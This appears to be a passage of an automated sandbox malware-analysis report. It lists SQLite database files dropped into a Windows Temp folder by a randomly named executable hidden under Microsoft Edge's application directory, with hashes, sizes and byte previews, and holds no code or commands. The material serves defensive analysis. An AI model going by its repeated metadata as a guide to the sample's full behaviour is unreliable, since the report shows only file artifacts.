                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\o9T1o70l9c

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):106496
                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\oomjhqf1ph

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):40960
                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\ovTNqMTVJs

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):28672
                                                                                                                      Entropy (8bit):2.5793180405395284
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\p0Bgop0HBZ

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):106496
                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\p8arznBUkJ

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.5707520969659783
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\pBiWEL8ivD

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):114688
                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\pj6jWvaGwl

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):106496
                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\pmMgXUrxZ7

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):114688
                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\pwjvbCXeZS

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):106496
                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\pyj91tC4RS

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):40960
                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\qDFgLak8IH

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.5707520969659783
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\qEiqa27Yky

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):49152
                                                                                                                      Entropy (8bit):0.8180424350137764
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\r5bTTCHYcE

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.5712781801655107
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\rQtHfgKFml

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):40960
                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\s8qJR17h0m

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):40960
                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\sBbicEvAjT

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.5712781801655107
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\sbWv71Pmx6

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):40960
                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\t0EW4zUi8l

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):114688
                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\tuNpGwk1kM

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):40960
                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\ulM8BH6U3T

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):49152
                                                                                                                      Entropy (8bit):0.8180424350137764
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\umFMX3ei74

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):40960
                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
